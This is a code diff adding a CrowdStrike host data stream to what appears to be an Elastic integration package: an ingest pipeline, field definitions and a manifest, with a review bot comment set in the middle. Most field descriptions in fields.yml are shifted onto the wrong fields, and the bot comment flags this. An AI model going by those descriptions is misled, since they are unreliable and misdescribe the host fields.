rename_device_policies_firewall_rule_set_id + target_field: crowdstrike.host.device_policies.firewall.rule_set_id + ignore_missing: true + - convert: + field: json.device_policies.global_config.applied + tag: convert_device_policies_global_config_applied_to_boolean + target_field: crowdstrike.host.device_policies.global_config.applied + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device_policies.global_config.applied_date + tag: date_device_policies_global_config_applied_date + target_field: crowdstrike.host.device_policies.global_config.applied_date + formats: + - ISO8601 + if: ctx.json?.device_policies?.global_config?.applied_date != null && ctx.json.device_policies.global_config.applied_date != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device_policies.global_config.assigned_date + tag: date_device_policies_global_config_assigned_date + target_field: crowdstrike.host.device_policies.global_config.assigned_date + formats: + - ISO8601 + if: ctx.json?.device_policies?.global_config?.assigned_date != null && ctx.json.device_policies.global_config.assigned_date != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.device_policies.global_config.policy_id + tag: rename_device_policies_global_config_policy_id + target_field: 
crowdstrike.host.device_policies.global_config.policy.id + ignore_missing: true + - rename: + field: json.device_policies.global_config.policy_type + tag: rename_device_policies_global_config_policy_type + target_field: crowdstrike.host.device_policies.global_config.policy.type + ignore_missing: true + - rename: + field: json.device_policies.global_config.settings_hash + tag: rename_device_policies_global_config_settings_hash + target_field: crowdstrike.host.device_policies.global_config.settings_hash + ignore_missing: true + - append: + field: related.hash + value: '{{{crowdstrike.host.device_policies.global_config.settings_hash}}}' + allow_duplicates: false + if: ctx.crowdstrike?.host?.device_policies?.global_config?.settings_hash != null + - convert: + field: json.device_policies.prevention.applied + tag: convert_device_policies_prevention_applied_to_boolean + target_field: crowdstrike.host.device_policies.prevention.applied + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device_policies.prevention.applied_date + tag: date_device_policies_prevention_applied_date + target_field: crowdstrike.host.device_policies.prevention.applied_date + formats: + - ISO8601 + if: ctx.json?.device_policies?.prevention?.applied_date != null && ctx.json.device_policies.prevention.applied_date != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.device_policies.prevention.assigned_date + tag: date_device_policies_prevention_assigned_date + target_field: 
crowdstrike.host.device_policies.prevention.assigned_date
+ formats:
+ - ISO8601
+ if: ctx.json?.device_policies?.prevention?.assigned_date != null && ctx.json.device_policies.prevention.assigned_date != ''
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - rename:
+ field: json.device_policies.prevention.policy_id
+ tag: rename_device_policies_prevention_policy_id
+ target_field: crowdstrike.host.device_policies.prevention.policy.id
+ ignore_missing: true
+ - rename:
+ field: json.device_policies.prevention.policy_type
+ tag: rename_device_policies_prevention_policy_type
+ target_field: crowdstrike.host.device_policies.prevention.policy.type
+ ignore_missing: true
+ - rename:
+ field: json.device_policies.prevention.rule_groups
+ tag: rename_device_policies_prevention_rule_groups
+ target_field: crowdstrike.host.device_policies.prevention.rule_groups
+ ignore_missing: true
+ - rename:
+ field: json.device_policies.prevention.settings_hash
+ tag: rename_device_policies_prevention_settings_hash
+ target_field: crowdstrike.host.device_policies.prevention.settings_hash
+ ignore_missing: true
+ - append:
+ field: related.hash
+ value: '{{{crowdstrike.host.device_policies.prevention.settings_hash}}}'
+ allow_duplicates: false
+ if: ctx.crowdstrike?.host?.device_policies?.prevention?.settings_hash != null
+ - convert:
+ field: json.device_policies.remote_response.applied
+ tag: convert_device_policies_remote_response_applied_to_boolean
+ target_field: crowdstrike.host.device_policies.remote_response.applied
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - date:
+ field: json.device_policies.remote_response.applied_date
+ tag: date_device_policies_remote_response_applied_date
+ target_field: crowdstrike.host.device_policies.remote_response.applied_date
+ formats:
+ - ISO8601
+ if: ctx.json?.device_policies?.remote_response?.applied_date != null && ctx.json.device_policies.remote_response.applied_date != ''
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - date:
+ field: json.device_policies.remote_response.assigned_date
+ tag: date_device_policies_remote_response_assigned_date
+ target_field: crowdstrike.host.device_policies.remote_response.assigned_date
+ formats:
+ - ISO8601
+ if: ctx.json?.device_policies?.remote_response?.assigned_date != null && ctx.json.device_policies.remote_response.assigned_date != ''
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - rename:
+ field: json.device_policies.remote_response.policy_id
+ tag: rename_device_policies_remote_response_policy_id
+ target_field: crowdstrike.host.device_policies.remote_response.policy.id
+ ignore_missing: true
+ - rename:
+ field: json.device_policies.remote_response.policy_type
+ tag: rename_device_policies_remote_response_policy_type
+ target_field: crowdstrike.host.device_policies.remote_response.policy.type
+ ignore_missing: true
+ - rename:
+ field: json.device_policies.remote_response.settings_hash
+ tag: rename_device_policies_remote_response_settings_hash
+ target_field: crowdstrike.host.device_policies.remote_response.settings_hash
+ ignore_missing: true
+ - append:
+ field: related.hash
+ value: '{{{crowdstrike.host.device_policies.remote_response.settings_hash}}}'
+ allow_duplicates: false
+ if: ctx.crowdstrike?.host?.device_policies?.remote_response?.settings_hash != null
+ - convert:
+ field: json.device_policies.sensor_update.applied
+ tag: convert_device_policies_sensor_update_applied_to_boolean
+ target_field: crowdstrike.host.device_policies.sensor_update.applied
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - date:
+ field: json.device_policies.sensor_update.applied_date
+ tag: date_device_policies_sensor_update_applied_date
+ target_field: crowdstrike.host.device_policies.sensor_update.applied_date
+ formats:
+ - ISO8601
+ if: ctx.json?.device_policies?.sensor_update?.applied_date != null && ctx.json.device_policies.sensor_update.applied_date != ''
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - date:
+ field: json.device_policies.sensor_update.assigned_date
+ tag: date_device_policies_sensor_update_assigned_date
+ target_field: crowdstrike.host.device_policies.sensor_update.assigned_date
+ formats:
+ - ISO8601
+ if: ctx.json?.device_policies?.sensor_update?.assigned_date != null && ctx.json.device_policies.sensor_update.assigned_date != ''
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - rename:
+ field: json.device_policies.sensor_update.policy_id
+ tag: rename_device_policies_sensor_update_policy_id
+ target_field: crowdstrike.host.device_policies.sensor_update.policy.id
+ ignore_missing: true
+ - rename:
+ field: json.device_policies.sensor_update.policy_type
+ tag: rename_device_policies_sensor_update_policy_type
+ target_field: crowdstrike.host.device_policies.sensor_update.policy.type
+ ignore_missing: true
+ - rename:
+ field: json.device_policies.sensor_update.settings_hash
+ tag: rename_device_policies_sensor_update_settings_hash
+ target_field: crowdstrike.host.device_policies.sensor_update.settings_hash
+ ignore_missing: true
+ - append:
+ field: related.hash
+ value: '{{{crowdstrike.host.device_policies.sensor_update.settings_hash}}}'
+ allow_duplicates: false
+ if: ctx.crowdstrike?.host?.device_policies?.sensor_update?.settings_hash != null
+ - rename:
+ field: json.device_policies.sensor_update.uninstall_protection
+ tag: rename_device_policies_sensor_update_uninstall_protection
+ target_field: crowdstrike.host.device_policies.sensor_update.uninstall_protection
+ ignore_missing: true
+ - convert:
+ field: json.external_ip
+ tag: convert_external_ip_to_ip
+ target_field: crowdstrike.host.external_ip
+ type: ip
+ ignore_missing: true
+ if: ctx.json?.external_ip != null && ctx.json.external_ip != ''
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - append:
+ field: related.ip
+ tag: append_external_ip_into_related_ip
+ value: '{{{crowdstrike.host.external_ip}}}'
+ allow_duplicates: false
+ if: ctx.crowdstrike?.host?.external_ip != null
+ - append:
+ field: host.ip
+ tag: append_crowdstrike_host_external_ip_into_host_ip
+ value: '{{{crowdstrike.host.external_ip}}}'
+ allow_duplicates: false
+ if: ctx.crowdstrike?.host?.external_ip != null
+ - geoip:
+ field: host.ip
+ target_field: host.geo
+ ignore_missing: true
+ - date:
+ field: json.first_seen
+ tag: date_first_seen
+ target_field: crowdstrike.host.first_seen
+ formats:
+ - ISO8601
+ if: ctx.json?.first_seen != null && ctx.json.first_seen != ''
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - rename:
+ field: json.group_hash
+ tag: rename_group_hash
+ target_field: crowdstrike.host.group_hash
+ ignore_missing: true
+ - append:
+ field: related.hash
+ value: '{{{crowdstrike.host.group_hash}}}'
+ allow_duplicates: false
+ if: ctx.crowdstrike?.host?.group_hash != null
+ - rename:
+ field: json.groups
+ tag: rename_groups
+ target_field: crowdstrike.host.groups
+ ignore_missing: true
+ - rename:
+ field: json.hostname
+ tag: rename_hostname
+ target_field: crowdstrike.host.hostname
+ ignore_missing: true
+ - set:
+ field: host.hostname
+ tag: set_host_hostname_from_host_hostname
+ copy_from: crowdstrike.host.hostname
+ ignore_empty_value: true
+ - append:
+ field: related.hosts
+ value: '{{{host.hostname}}}'
+ allow_duplicates: false
+ if: ctx.host?.hostname != null
+ - rename:
+ field: json.device_id
+ tag: rename_device_id
+ target_field: crowdstrike.host.id
+ ignore_missing: true
+ - set:
+ field: device.id
+ tag: set_device_id_from_host_id
+ copy_from: crowdstrike.host.id
+ ignore_empty_value: true
+ - rename:
+ field: json.kernel_version
+ tag: rename_kernel_version
+ target_field: crowdstrike.host.kernel_version
+ ignore_missing: true
+ - date:
+ field: json.last_seen
+ tag: date_last_seen
+ target_field: crowdstrike.host.last_seen
+ formats:
+ - ISO8601
+ if: ctx.json?.last_seen != null && ctx.json.last_seen != ''
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.local_ip
+ tag: convert_local_ip_to_ip
+ target_field: crowdstrike.host.local_ip
+ type: ip
+ ignore_missing: true
+ if: ctx.json?.local_ip != null && ctx.json.local_ip != ''
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - append:
+ field: related.ip
+ tag: append_local_ip_into_related_ip
+ value: '{{{crowdstrike.host.local_ip}}}'
+ allow_duplicates: false
+ if: ctx.crowdstrike?.host?.local_ip != null
+ - gsub:
+ field: json.mac_address
+ tag: gsub_mac_address
+ pattern: '[:.]'
+ replacement: '-'
+ target_field: crowdstrike.host.mac_address
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - uppercase:
+ field: crowdstrike.host.mac_address
+ tag: uppercase_mac_address
+ ignore_missing: true
+ if: ctx.crowdstrike?.host?.mac_address != ''
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - append:
+ field: host.mac
+ value: '{{{crowdstrike.host.mac_address}}}'
+ tag: append_device_mac_address_into_host_mac
+ allow_duplicates: false
+ if: ctx.crowdstrike?.host?.mac_address != null
+ - rename:
+ field: json.machine_domain
+ tag: rename_machine_domain
+ target_field: crowdstrike.host.machine_domain
+ ignore_missing: true
+ - append:
+ field: related.hosts
+ value: '{{{crowdstrike.host.machine_domain}}}'
+ allow_duplicates: false
+ if: ctx.crowdstrike?.host?.machine_domain != null
+ - rename:
+ field: json.major_version
+ tag: rename_major_version
+ target_field: crowdstrike.host.major_version
+ ignore_missing: true
+ - rename:
+ field: json.meta.version
+ tag: rename_meta_version
+ target_field: crowdstrike.host.meta.version
+ ignore_missing: true
+ - rename:
+ field: json.meta.version_string
+ tag: rename_meta_version_string
+ target_field: crowdstrike.host.meta.version_string
+ ignore_missing: true
+ - rename:
+ field: json.minor_version
+ tag: rename_minor_version
+ target_field: crowdstrike.host.minor_version
+ ignore_missing: true
+ - date:
+ field: json.modified_timestamp
+ tag: date_modified_timestamp
+ target_field: crowdstrike.host.modified_timestamp
+ formats:
+ - ISO8601
+ if: ctx.json?.modified_timestamp != null && ctx.json.modified_timestamp != ''
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - set:
+ field: '@timestamp'
+ tag: set_@timestamp_from_host_modified_timestamp
+ copy_from: crowdstrike.host.modified_timestamp
+ ignore_empty_value: true
+ - rename:
+ field: json.os_build
+ tag: rename_os_build
+ target_field: crowdstrike.host.os.build
+ ignore_missing: true
+ - rename:
+ field: json.os_version
+ tag: rename_os_version
+ target_field: crowdstrike.host.os.version
+ ignore_missing: true
+ - set:
+ field: host.os.full
+ tag: set_host_os_full_from_host_os_version
+ copy_from: crowdstrike.host.os.version
+ ignore_empty_value: true
+ - rename:
+ field: json.platform_id
+ tag: rename_platform_id
+ target_field: crowdstrike.host.platform.id
+ ignore_missing: true
+ - rename:
+ field: json.platform_name
+ tag: rename_platform_name
+ target_field: crowdstrike.host.platform.name
+ ignore_missing: true
+ - set:
+ field: host.os.platform
+ tag: set_host_os_platform_from_host_platform_name
+ copy_from: crowdstrike.host.platform.name
+ ignore_empty_value: true
+ - foreach:
+ field: json.policies
+ if: ctx.json?.policies instanceof List
+ ignore_failure: true
+ processor:
+ convert:
+ field: _ingest._value.applied
+ tag: convert_policies_applied_to_boolean
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.applied
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: json.policies
+ if: ctx.json?.policies instanceof List
+ ignore_failure: true
+ processor:
+ date:
+ field: _ingest._value.applied_date
+ tag: date_policies_applied_date
+ target_field: _ingest._value.applied_date
+ formats:
+ - ISO8601
+ on_failure:
+ - remove:
+ field: _ingest._value.applied_date
+ ignore_missing: true
+ - foreach:
+ field: json.policies
+ if: ctx.json?.policies instanceof List
+ ignore_failure: true
+ processor:
+ date:
+ field: _ingest._value.assigned_date
+ tag: date_policies_assigned_date
+ target_field: _ingest._value.assigned_date
+ formats:
+ - ISO8601
+ on_failure:
+ - remove:
+ field: _ingest._value.assigned_date
+ ignore_missing: true
+ - foreach:
+ field: json.policies
+ if: ctx.json?.policies instanceof List
+ ignore_failure: true
+ processor:
+ rename:
+ field: _ingest._value.policy_id
+ tag: rename_policies_policy_id
+ target_field: _ingest._value.policy.id
+ ignore_missing: true
+ - foreach:
+ field: json.policies
+ if: ctx.json?.policies instanceof List
+ ignore_failure: true
+ processor:
+ rename:
+ field: _ingest._value.policy_type
+ tag: rename_policies_policy_type
+ target_field: _ingest._value.policy.type
+ ignore_missing: true
+ - rename:
+ field: json.policies
+ tag: rename_policies
+ target_field: crowdstrike.host.policies
+ ignore_missing: true
+ - foreach:
+ field: crowdstrike.host.policies
+ if: ctx.crowdstrike?.host.policies instanceof List
+ ignore_failure: true
+ processor:
+ append:
+ field: related.hash
+ value: '{{{_ingest._value.settings_hash}}}'
+ allow_duplicates: false
+ - rename:
+ field: json.product_type_desc
+ tag: rename_product_type_desc
+ target_field: crowdstrike.host.product_type_desc
+ ignore_missing: true
+ - rename:
+ field: json.provision_status
+ tag: rename_provision_status
+ target_field: crowdstrike.host.provision_status
+ ignore_missing: true
+ - rename:
+ field: json.reduced_functionality_mode
+ tag: rename_reduced_functionality_mode
+ target_field: crowdstrike.host.reduced_functionality_mode
+ ignore_missing: true
+ - rename:
+ field: json.serial_number
+ tag: rename_serial_number
+ target_field: crowdstrike.host.serial_number
+ ignore_missing: true
+ - rename:
+ field: json.site_name
+ tag: rename_site_name
+ target_field: crowdstrike.host.site_name
+ ignore_missing: true
+ - rename:
+ field: json.status
+ tag: rename_status
+ target_field: crowdstrike.host.status
+ ignore_missing: true
+ - rename:
+ field: json.system_manufacturer
+ tag: rename_system_manufacturer
+ target_field: crowdstrike.host.system.manufacturer
+ ignore_missing: true
+ - rename:
+ field: json.system_product_name
+ tag: rename_system_product_name
+ target_field: crowdstrike.host.system.product_name
+ ignore_missing: true
+ - rename:
+ field: json.tags
+ tag: rename_tags
+ target_field: crowdstrike.host.tags
+ ignore_missing: true
+ - remove:
+ field:
+ - crowdstrike.host.external_ip
+ - crowdstrike.host.hostname
+ - crowdstrike.host.id
+ - crowdstrike.host.mac_address
+ - crowdstrike.host.modified_timestamp
+ - crowdstrike.host.os.version
+ - crowdstrike.host.platform.name
+ tag: remove_custom_duplicate_fields
+ ignore_missing: true
+ if: ctx.tags == null || !(ctx.tags.contains('preserve_duplicate_custom_fields'))
+ - remove:
+ field: json
+ tag: remove_json
+ ignore_missing: true
+ - remove:
+ field: event.original
+ tag: remove_event_original
+ ignore_missing: true
+ if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))
+ - script:
+ tag: script_to_drop_null_values
+ lang: painless
+ source: |-
+ boolean drop(Object o) {
+ if (o == null || o == '') {
+ return true;
+ } else if (o instanceof Map) {
+ ((Map) o).values().removeIf(v -> drop(v));
+ return (((Map) o).size() == 0);
+ } else if (o instanceof List) {
+ ((List) o).removeIf(v -> drop(v));
+ return (((List) o).length == 0);
+ }
+ return false;
+ }
+ drop(ctx);
+ description: Drops null/empty values recursively.
+ - append:
+ field: event.kind
+ value: pipeline_error
+ allow_duplicates: false
+ if: ctx.error?.message != null
+on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - set:
+ field: event.kind
+ tag: set_pipeline_error_to_event_kind
+ value: pipeline_error
diff --git a/packages/crowdstrike/data_stream/host/fields/base-fields.yml b/packages/crowdstrike/data_stream/host/fields/base-fields.yml
new file mode 100644
index 00000000000..44670987f11
--- /dev/null
+++ b/packages/crowdstrike/data_stream/host/fields/base-fields.yml
@@ -0,0 +1,20 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: event.module
+ type: constant_keyword
+ description: Event module.
+ value: crowdstrike
+- name: event.dataset
+ type: constant_keyword
+ description: Event dataset.
+ value: crowdstrike.host
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
diff --git a/packages/crowdstrike/data_stream/host/fields/beats.yml b/packages/crowdstrike/data_stream/host/fields/beats.yml
new file mode 100644
index 00000000000..b3701b581cf
--- /dev/null
+++ b/packages/crowdstrike/data_stream/host/fields/beats.yml
@@ -0,0 +1,9 @@
+- name: input.type
+ type: keyword
+ description: Type of filebeat input.
+- name: log.offset
+ type: long
+ description: Log offset.
+- name: tags
+ type: keyword
+ description: User defined tags.
diff --git a/packages/crowdstrike/data_stream/host/fields/fields.yml b/packages/crowdstrike/data_stream/host/fields/fields.yml
new file mode 100644
index 00000000000..d36aeaec2c6
--- /dev/null
+++ b/packages/crowdstrike/data_stream/host/fields/fields.yml
@@ -0,0 +1,285 @@
+- name: crowdstrike.host
+ type: group
+ fields:
+ - name: agent
+ type: group
+ fields:
+ - name: load_flags
+ type: keyword
+ description: Any errors associated with the incident.
+ - name: local_time
+ type: date
+ description: The fine score associated with the incident.
+ - name: version
+ type: keyword
+ description: The list of host IDs associated with the incident.
+ - name: bios
+ type: group
+ fields:
+ - name: manufacturer
+ type: keyword
+ description: Flags indicating the load status of the agent on the host.
+ - name: version
+ type: keyword
+ description: The local time on the host where the agent is running.
+ - name: chassis_type
+ type: group
+ fields:
+ - name: desc
+ type: keyword
+ description: The version of the agent running on the host.
+ - name: value
+ type: keyword
+ description: The manufacturer of the BIOS on the host.
+ - name: cid
+ type: keyword
+ description: The version of the BIOS on the host.
+ - name: config_id
+ type: group
+ fields:
+ - name: base
+ type: keyword
+ description: The customer ID associated with the host.
+ - name: build
+ type: keyword
+ description: The base configuration ID associated with the host.
+ - name: platform
+ type: keyword
+ description: The build configuration ID associated with the host.
+ - name: connection_ip
+ type: ip
+ description: The platform configuration ID associated with the host.
+ - name: cpu_signature
+ type: keyword
+ description: The device ID associated with the host.
+ - name: device_policies
+ type: group
+ fields:
+ - name: device_control
+ type: group
+ fields:
+ - name: applied
+ type: boolean
+ description: Timestamp indicating when the host was first seen.
+ - name: applied_date
+ type: date
+ description: The groups associated with the host.
+ - name: assigned_date
+ type: date
+ description: Timestamp indicating when the host was last seen.
+ - name: policy_id
+ type: keyword
+ description: The local IP address of the host.
+ - name: policy_type
+ type: keyword
+ description: The domain to which the machine belongs.
+ - name: firewall
+ type: group
+ fields:
+ - name: applied
+ type: boolean
+ description: The major version of the operating system on the host.
+ - name: applied_date
+ type: date
+ description: The minor version of the operating system on the host.
+ - name: assigned_date
+ type: date
+ description: Timestamp indicating when the host information was last modified.
+ - name: policy
+ type: group
+ fields:
+ - name: id
+ type: keyword
+ description: The organizational units associated with the host.
+ - name: type
+ type: keyword
+ description: The platform ID of the host.
+ - name: rule_set_id
+ type: keyword
+ description: The platform name of the host.
+ - name: global_config
+ type: group
+ fields:
+ - name: applied
+ type: boolean
+ description: The description of the product type of the host.
+ - name: applied_date
+ type: date
+ description: The product type of the host.
+ - name: assigned_date
+ type: date
+ description: The site name associated with the host.
+ - name: policy
+ type: group
+ fields:
+ - name: id
+ type: keyword
+ description: The status of the host.
+ - name: type
+ type: keyword
+ description: The manufacturer of the system on the host.
+ - name: settings_hash
+ type: keyword
+ description: The product name of the system on the host.
+ - name: prevention
+ type: group
+ fields:
+ - name: applied
+ type: boolean
+ description: The objectives associated with the incident.
+ - name: applied_date
+ type: date
+ description: The state of the incident, whether open or closed.
+ - name: assigned_date
+ type: date
+ description: The status of the incident.
+ - name: policy
+ type: group
+ fields:
+ - name: id
+ type: keyword
+ description: The tactics associated with the incident.
+ - name: type
+ type: keyword
+ description: The techniques associated with the incident.
+ - name: rule_groups
+ type: keyword
+ description: The type of incident.
+ - name: settings_hash
+ type: keyword
+ description: The users associated with the incident.
+ - name: remote_response
+ type: group
+ fields:
+ - name: applied
+ type: boolean
+ - name: applied_date
+ type: date
+ - name: assigned_date
+ type: date
+ - name: policy
+ type: group
+ fields:
+ - name: id
+ type: keyword
+ - name: type
+ type: keyword
+ - name: settings_hash
+ type: keyword
+ - name: sensor_update
+ type: group
+ fields:
+ - name: applied
+ type: boolean
+ - name: applied_date
+ type: date
+ - name: assigned_date
+ type: date
+ - name: policy
+ type: group
+ fields:
+ - name: id
+ type: keyword
+ - name: type
+ type: keyword
+ - name: settings_hash
+ type: keyword
+ - name: uninstall_protection
+ type: keyword
+ - name: external_ip
+ type: ip
+ description: The external IP address of the host.
+ - name: first_seen
+ type: date
+ - name: group_hash
+ type: keyword
+ - name: groups
+ type: keyword
+ - name: hostname
+ type: keyword
+ description: The hostname of the host.
+ - name: id
+ type: keyword
+ description: Timestamp indicating when the incident started.
+ - name: kernel_version
+ type: keyword
+ - name: last_seen
+ type: date
+ - name: local_ip
+ type: ip
+ - name: mac_address
+ type: keyword
+ description: The MAC address of the host.
+ - name: machine_domain
+ type: keyword
+ - name: major_version
+ type: keyword
+ - name: meta
+ type: group
+ fields:
+ - name: version
+ type: keyword
+ - name: version_string
+ type: keyword
+ - name: minor_version
+ type: keyword
+ - name: modified_timestamp
+ type: date
+ description: Timestamp indicating when the incident was created.
+ - name: os
+ type: group
+ fields:
+ - name: build
+ type: keyword
+ - name: version
+ type: keyword
+ description: The version of the operating system on the host.
+ - name: platform
+ type: group
+ fields:
+ - name: id
+ type: keyword
+ - name: name
+ type: keyword
+ description: The identifier associated with the customer.
+ - name: policies
+ type: group
+ fields:
+ - name: applied
+ type: boolean
+ - name: applied_date
+ type: date
+ - name: assigned_date
+ type: date
+ - name: policy
+ type: group
+ fields:
+ - name: id
+ type: keyword
+ - name: type
+ type: keyword
+ - name: rule_groups
+ type: keyword
+ - name: settings_hash
+ type: keyword
+ - name: product_type_desc
+ type: keyword
+ - name: provision_status
+ type: keyword
+ - name: reduced_functionality_mode
+ type: keyword
+ - name: serial_number
+ type: keyword
+ - name: site_name
+ type: keyword
+ - name: status
+ type: keyword
+ - name: system
+ type: group
+ fields:
+ - name: manufacturer
+ type: keyword
+ - name: product_name
+ type: keyword
+ - name: tags
+ type: keyword
diff --git a/packages/crowdstrike/data_stream/host/manifest.yml b/packages/crowdstrike/data_stream/host/manifest.yml
new file mode 100644
index 00000000000..27ee3ddf544
--- /dev/null
+++ b/packages/crowdstrike/data_stream/host/manifest.yml
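Review bot: Most `description` values under `crowdstrike.host` describe a different object than the field they sit on — `agent.load_flags` is documented as "Any errors associated with the incident.", `agent.local_time` as "The fine score associated with the incident.", `id` as "Timestamp indicating when the incident started.", `modified_timestamp` as "Timestamp indicating when the incident was created." and `platform.name` as "The identifier associated with the customer." — which looks like text carried over from an incident field list and shifted by one entry (`bios.manufacturer` carries the load_flags wording, `bios.version` the local_time wording, and so on down to `cpu_signature`). These descriptions are rendered into the package README and Kibana field tooltips, so an analyst reading `id` as a timestamp or `cid` as a BIOS version is being actively misled; each entry should be rewritten for the host field it belongs to, e.g. `description: Flags indicating the load status of the agent on the host.` on `agent.load_flags`, `description: The CrowdStrike customer ID (CID) the host belongs to.` on `cid`, `description: The unique device ID of the host.` on `id`, and `description: Timestamp of the last modification of the host record.` on `modified_timestamp`. Separately, `device_control` keeps flat `policy_id`/`policy_type` fields while every sibling policy block uses a `policy.id`/`policy.type` group; the sample event in this change has the same shape, so it matches the pipeline as shipped, but it is worth confirming that asymmetry is intended rather than a missed rename.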
@@ -0,0 +1,81 @@
+title: Collect Host logs from CrowdStrike.
+type: logs
+streams:
+ - input: cel
+ title: Hosts
+ description: Collect Hosts/Devices from CrowdStrike Falcon Intelligence.
+ enabled: false
+ template_path: cel.yml.hbs
+ vars:
+ - name: initial_interval
+ type: text
+ title: Initial Interval
+ description: How far back to pull the Host logs from CrowdStrike. Supported units for this parameter are h/m/s.
+ multi: false
+ required: true
+ show_user: true
+ default: 24h
+ - name: interval
+ type: text
+ title: Interval
+ description: Duration between requests to the CrowdStrike API. Supported units for this parameter are h/m/s.
+ default: 5m
+ multi: false
+ required: true
+ show_user: true
+ - name: batch_size
+ type: integer
+ title: Batch Size
+ description: Batch size for the response of the CrowdStrike API. It must be between 1 - 5000.
+ default: 5000
+ multi: false
+ required: true
+ show_user: false
+ - name: http_client_timeout
+ type: text
+ title: HTTP Client Timeout
+ description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h.
+ multi: false
+ required: true
+ show_user: false
+ default: 30s
